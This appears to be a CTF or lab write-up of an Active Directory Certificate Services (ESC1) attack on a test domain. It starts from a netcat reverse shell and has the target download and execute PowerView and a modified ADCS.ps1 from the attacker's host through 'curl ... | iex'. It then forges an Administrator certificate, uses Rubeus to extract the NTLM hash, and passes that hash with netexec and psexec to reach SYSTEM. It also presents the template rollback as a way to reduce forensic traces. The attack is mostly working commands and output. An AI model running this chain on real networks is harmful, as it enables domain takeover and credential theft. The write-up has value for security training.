Practical Rubeus binary for PKINIT: Certificate SAN Impersonation
PKINIT Overview
Specifies the Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos Protocol. This protocol enables the use of public key cryptography in the initial authentication exchange of the Kerberos Protocol (PKINIT) and specifies the Windows implementation of PKINIT.
Attack Path Overview
The core of the ESC1 exploitation technique relies on the attacker's ability to request a certificate while specifying an arbitrary Subject Alternative Name, effectively allowing impersonation of any domain principal including high-privileged accounts such as Domain Administrators.
During the attack execution, the certificate template was temporarily modified to enable smartcard authentication requirements and accept SAN specifications, a certificate was requested with "Administrator" as the SAN value, and the template was automatically rolled back to its original configuration to minimize forensic artifacts.
The issued certificate was then leveraged using PKINIT to authenticate as the Administrator account and obtain a Ticket Granting Ticket (TGT), which subsequently allowed extraction of the NTLM hash through Rubeus.
Practical Script Preparation
First we gain initial access as user diegocruz, which now this user have no business logon with LDAP nor SMB nor WinRM, nor anything:
┌──(byt3n33dl3㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.40] from (UNKNOWN) [192.168.231.180] 51453
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\System32> whoami
whoami
windcorp\diegocruzWe gain access shell!! as regular user, then with help of PowerView.ps1 we are now able to run Rubeus.exe binary executable, but before that happen PowerView.ps1 also needed an extra tools named ADCS.ps1, which we need to modify it little bit in this attack-paths due to SAN.
This is the line we needed to Updates (Lines 927-935) upon ADCS.ps1:
}
else {
$TargetUPN = $user.SamAccountName
if(-not $TargetUPN)
{
Write-Warning "User $($Identity) does not have a UPN."
$STOPERROR = $true
}
}This changes happen due to an old machine as Pentesting scenario, which is one other bug in ACDS.ps1 that will break because of a misconfiguration specific to this machine, and that is that the the UserPrincipleName on the Administrator account is messed up, set to an old domain.
After that we will remove BOM with sed
┌──(byt3n33dl3㉿kali)-[~]
└─$ sed -i '1s/^\xEF\xBB\xBF//' ADCS.ps1This vulnerability exists due to three concurrent misconfigurations, which the template allows requesters to specify arbitrary SAN ENROLLEE_SUPPLIES_SUBJECT flag enabled, includes client authentication as an extended key usage or EKU, enabling Kerberos PKINIT authentication, and grants either enrollment rights to low-privileged users or write permissions allowing temporary template modification.
Now let's see the tools we needed to launch:
┌──(byt3n33dl3㉿kali)-[~]
└─$ ls
ADCS.ps1 PowerView.ps1 Rubeus.exe
Now we're ready!
Practical Attack and Execution
First we will download the Rubeus.exe on non-sensitive directory:
iwr -uri http://10.10.14.40/Rubeus.exe -outfile Rubeus.exeFollowed by the rest of PowerShell script of PowerView.ps1 and ADCS.ps1:
curl http://10.10.14.40/PowerView.ps1 | iexcurl http://10.10.14.40/ADCS.ps1 | iexSupposed everything running smoothly, leaving us with only Rubeus binary.
PS C:\programdata> dir
dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/27/2026 5:47 AM docker
d---s- 8/11/2021 1:07 PM Microsoft
d----- 1/27/2026 5:45 AM Package Cache
d----- 1/27/2026 6:13 AM regid.1991-06.com.microsoft
d----- 9/15/2018 9:19 AM SoftwareDistribution
d----- 2/6/2021 6:31 AM ssh
d----- 2/25/2021 9:24 PM USOPrivate
d----- 2/6/2021 6:31 AM USOShared
d----- 7/17/2021 4:35 PM VMware
-a---- 1/27/2026 6:14 AM 474112 Rubeus.exeGreat, with that we use Get-SmartCardCertificate to generate the certificate request and get it approved by the CA. Then giving it the user I want it for and the template, and making sure it knows there's no physical smart card present.
Once that completes, we find the certificate in the current user's store:
Get-SmartCardCertificate -Identity Administrator -TemplateName Web -NoSmartCard -VerboseThen:
PS C:\programdata> gci cert:\currentuser\my -recurse
gci cert:\currentuser\my -recurse
PSParentPath: Microsoft.PowerShell.Security\Certificate::currentuser\my
Thumbprint Subject
---------- -------
43E4EFDB09714747AFBBD481E43C1497423CD8AD
PS C:\programdata>Great, now we just need to run Rubeus to ask TGT from Administrator, supposed to gave us NTLM.
PS C:\programdata> .\Rubeus.exe asktgt /user:Administrator /getcredentials /certificate:43E4EFDB09714747AFBBD481E43C1497423CD8AD
.\Rubeus.exe asktgt /user:Administrator /getcredentials /certificate:43E4EFDB09714747AFBBD481E43C1497423CD8AD
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: windcorp.vuln
[*] Using PKINIT with etype rc4_hmac and subject:
[*] Building AS-REQ (w/ PKINIT preauth) for: 'windcorp.vuln\Administrator'
[*] Using domain controller: fe80::5419:94c0:a893:9ff%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/windcorp.vuln
ServiceRealm : WINDCORP.VULN
UserName : Administrator (NT_PRINCIPAL)
UserRealm : WINDCORP.VULN
StartTime : 1/27/2026 6:25:53 AM
EndTime : 1/27/2026 4:25:53 PM
RenewTill : 2/3/2026 6:25:53 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : ezI2E1ucjc7CjUFksZpUMQ==
ASREP (key) : 78AE79DE3DEC36F85960E0C5C2A0A3D6
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 3CCC18280610C6CA3156F995B5899E09
PS C:\programdata>And now we gain the NTLM hashes of Administrator 3CCC18280610C6CA3156F995B5899E09 which can be used as logon.
┌──(byt3n33dl3㉿kali)-[~]
└─$ netexec smb MS02.windcorp.vuln -u administrator -H 3CCC18280610C6CA3156F995B5899E09
SMB 192.168.231.180 445 MS02 [*] Windows 10 / Server 2019 Build 17763 x64 (name:MS02) (domain:windcorp.vuln) (signing:True) (SMBv1:False)
SMB 192.168.231.180 445 MS02 [+] windcorp.vuln\administrator:3CCC18280610C6CA3156F995B5899E09 (Pwn3d!)┌──(byt3n33dl3㉿kali)-[~]
└─$ psexec.py administrator@MS02.windcorp.vuln -hashes :3CCC18280610C6CA3156F995B5899E09
Impacket v0.14.0.dev0+20251107.4500.2f1d6eb2 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on MS02.windcorp.vuln.....
[*] Found writable share ADMIN$
[*] Uploading file iCguXMXv.exe
[*] Opening SVCManager on MS02.windcorp.vuln.....
[*] Creating service hSGO on MS02.windcorp.vuln.....
[*] Starting service hSGO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
MS02Despite being publicly disclosed in 2021, approximately 40% of enterprise environments remain vulnerable due to the manual nature of remediation and lack of PKI monitoring.
Shout Outs
Major props to some engineers making this possible:
Happy hacking!
Moreover, Proton me if you have further question and suggestion.